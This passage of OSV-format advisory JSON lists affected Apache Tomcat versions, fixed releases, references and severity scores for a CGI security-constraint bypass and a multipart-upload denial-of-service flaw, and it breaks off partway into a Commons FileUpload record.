"CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h2fw-rfh5-95r3", "published": "2025-05-29T21:31:37Z", "modified": "2025-11-03T23:17:19.299895Z", "aliases": [ "BIT-tomcat-2025-46701", "CVE-2025-46701" ], "related": [ "CGA-m722-vhqr-x99v" ], "summary": "Apache Tomcat - CGI security constraint bypass", "details": "Improper Handling of Case Sensitivity vulnerability in Apache Tomcat's GCI servlet allows security constraint bypass of security constraints that apply to the pathInfo component of a URI mapped to the CGI servlet.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.6, from 10.1.0-M1 through 10.1.40, from 9.0.0.M1 through 9.0.104. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. Other, older, EOL versions may also be affected.\n\nUsers are recommended to upgrade to version 11.0.7, 10.1.41 or 9.0.105, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.105" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-h2fw-rfh5-95r3/GHSA-h2fw-rfh5-95r3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.41" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-h2fw-rfh5-95r3/GHSA-h2fw-rfh5-95r3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.7" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-h2fw-rfh5-95r3/GHSA-h2fw-rfh5-95r3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.105" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-h2fw-rfh5-95r3/GHSA-h2fw-rfh5-95r3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.41" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-h2fw-rfh5-95r3/GHSA-h2fw-rfh5-95r3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.7" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-h2fw-rfh5-95r3/GHSA-h2fw-rfh5-95r3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-h2fw-rfh5-95r3/GHSA-h2fw-rfh5-95r3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-h2fw-rfh5-95r3/GHSA-h2fw-rfh5-95r3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46701" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/0f01966eb60015d975525019e12a087f05ebf01a" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/238d2aa54b99f91d1111467e2237d2244c64e558" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2c6800111e7d8d8d5403c07978ea9bff3db5a5a5" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/8cb95ff03221067c511b3fa66d4f745bc4b0a605" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/8df00018a252baa9497615d6420fb6c10466fa74" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/fab7247d2f0e3a29d5daef565f829f383e10e5e2" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/xhqqk9w5q45srcdqhogdk04lhdscv30j" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00009.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.1.41" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html#Fixed_in_Apache_Tomcat_11.0.7" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.105" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/05/29/4" } ], "database_specific": { "cwe_ids": [ "CWE-178" ], "github_reviewed": true, "github_reviewed_at": "2025-05-29T22:37:21Z", "nvd_published_at": "2025-05-29T19:15:27Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/U:Clear" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h3gc-qfqq-6h8f", "published": "2025-06-16T15:32:28Z", "modified": "2025-11-03T21:49:36.618679Z", "aliases": [ "BIT-tomcat-2025-48988", "CVE-2025-48988" ], "related": [ "CGA-76pw-gh2p-78vh" ], "summary": "Apache Tomcat - DoS in multipart upload", "details": "Allocation of Resources Without Limits or Throttling vulnerability in Apache Tomcat.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.7, from 10.1.0-M1 through 10.1.41, from 9.0.0.M1 through 9.0.105. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. Other, older, EOL versions may also be affected.\n\nUsers are recommended to upgrade to version 11.0.8, 10.1.42 or 9.0.106, which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.8" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.7", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-h3gc-qfqq-6h8f/GHSA-h3gc-qfqq-6h8f.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.42" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.1.41", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-h3gc-qfqq-6h8f/GHSA-h3gc-qfqq-6h8f.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.106" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.105", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-h3gc-qfqq-6h8f/GHSA-h3gc-qfqq-6h8f.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.8" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.7", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-h3gc-qfqq-6h8f/GHSA-h3gc-qfqq-6h8f.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.42" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.1.41", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-h3gc-qfqq-6h8f/GHSA-h3gc-qfqq-6h8f.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.106" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.105", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-h3gc-qfqq-6h8f/GHSA-h3gc-qfqq-6h8f.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-h3gc-qfqq-6h8f/GHSA-h3gc-qfqq-6h8f.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-h3gc-qfqq-6h8f/GHSA-h3gc-qfqq-6h8f.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48988" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2b0ab14fb55d4edc896e5f1817f2ab76f714ae5e" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/cdde8e655bc1c5c60a07efd216251d77c52fd7f6" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/ee8042ffce4cb9324dfd79efda5984f37bbb6910" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/nzkqsok8t42qofgqfmck536mtyzygp18" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00009.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/06/16/1" } ], "database_specific": { "cwe_ids": [ "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2025-06-16T17:50:09Z", "nvd_published_at": "2025-06-16T15:15:24Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hfrx-6qgj-fp6c", "published": "2023-02-20T18:30:17Z", "modified": "2025-11-04T17:02:38.358233Z", "aliases": [ "CVE-2023-24998" ], "related": [ "CGA-vhv7-2gww-h7x4" ], "summary": "Apache Commons FileUpload denial of service vulnerability", "details": "Apache Commons FileUpload before 1.5 does not limit the number of request parts to be processed resulting in the possibility of an attacker triggering a DoS with a malicious upload or series of uploads. Note that, like all of the file upload limits, the new configuration option 